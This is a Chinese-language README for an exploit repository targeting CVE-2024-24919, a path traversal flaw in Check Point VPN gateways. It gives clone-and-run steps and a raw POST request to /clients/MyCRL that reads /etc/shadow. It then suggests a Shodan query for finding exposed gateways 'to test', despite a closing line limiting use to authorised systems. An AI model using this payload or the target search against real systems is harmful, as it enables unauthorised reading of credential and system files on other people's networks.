此仓库包含针对 CVE-2024-24919 的 Python 漏洞利用代码,该漏洞允许您从存在漏洞的页面读取敏感文件。
此漏洞利用首先检查目标是否易受攻击,然后获取您指定的路径。
严重程度: 严重
首先克隆仓库:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
赋予权限并使用 python3 执行漏洞利用
chmod +x exploit.py
python3 exploit.py
然后按照步骤操作,您将获得指定文件的数据
如果您遇到困难,请确保您指定的 URL 是主 URL
✓ https://google.com
✘ https://google.com/search?client=firefox
首先,我们需要确保目标网站启用了 Check Point Security Gateways 的远程访问 VPN 或移动访问软件。
在此漏洞利用中,我们指向 {ip}/clients/MyCRL 端点。
如果我们发起 POST 请求,并添加字符串 CSHELL/ 以及通过路径遍历要读取的文件路径,则该端点存在漏洞。
请求将类似于:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
以上信息均通过查看源代码获得。
有关此过程的更多信息,请查看此文章 --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
如果您想测试此漏洞,可以使用 Sodan 查找一些存在漏洞的网站,在 Sodan 中使用以下查询语句:
Server: “Check Point SVN Foundation”
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
此脚本仅供教育目的。请负责任地使用,并且仅在您获得权限的系统上使用。